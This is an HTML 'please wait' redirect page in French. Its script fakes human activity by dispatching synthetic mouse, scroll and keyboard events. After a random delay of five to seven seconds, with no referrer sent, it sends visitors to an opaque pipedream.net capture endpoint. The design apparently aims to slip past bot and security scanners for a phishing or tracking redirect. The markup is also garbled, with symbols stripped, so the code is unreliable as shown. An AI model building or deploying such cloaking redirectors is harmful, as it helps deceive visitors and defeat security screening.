!DOCTYPE html
html lang=en
head
meta charset=UTF-8
titleMerci de patienter...title
meta name=viewport content=width=device-width, initial-scale=1.0
meta name=referrer content=no-referrer
style
html, body {
height 100%;
margin 0;
font-family Arial, sans-serif;
background-color #f9f9f9;
display flex;
justify-content center;
align-items center;
text-align center;
}
.message {
font-size 20px;
color #333;
}
style
head
body
div class=message
Merci de patienter, nous vous redirigeons...
div
script
Simuler une activité humaine
function simulateActivity() {
Mouvements de souris aléatoires
const move = new MouseEvent(mousemove, {
bubbles true,
cancelable true,
clientX Math.floor(Math.random() window.innerWidth),
clientY Math.floor(Math.random() window.innerHeight)
});
document.dispatchEvent(move);
Scroll léger
window.scrollTo(0, Math.floor(Math.random() 200));
Touche clavier simulée (keydown)
const key = new KeyboardEvent(keydown, { key a });
document.dispatchEvent(key);
}
Simuler 2 à 3 activités légères
setTimeout(simulateActivity, 1000);
setTimeout(simulateActivity, 2500);
Redirection entre 5 et 7 secondes
const minDelay = 5000; 5s
const maxDelay = 7000; 7s
const delay = Math.floor(Math.random() (maxDelay - minDelay + 1)) + minDelay;
setTimeout(function () {
window.location.href = https://eo5ncqx17pbw3x8.m.pipedream.net;
}, delay);
script
body
html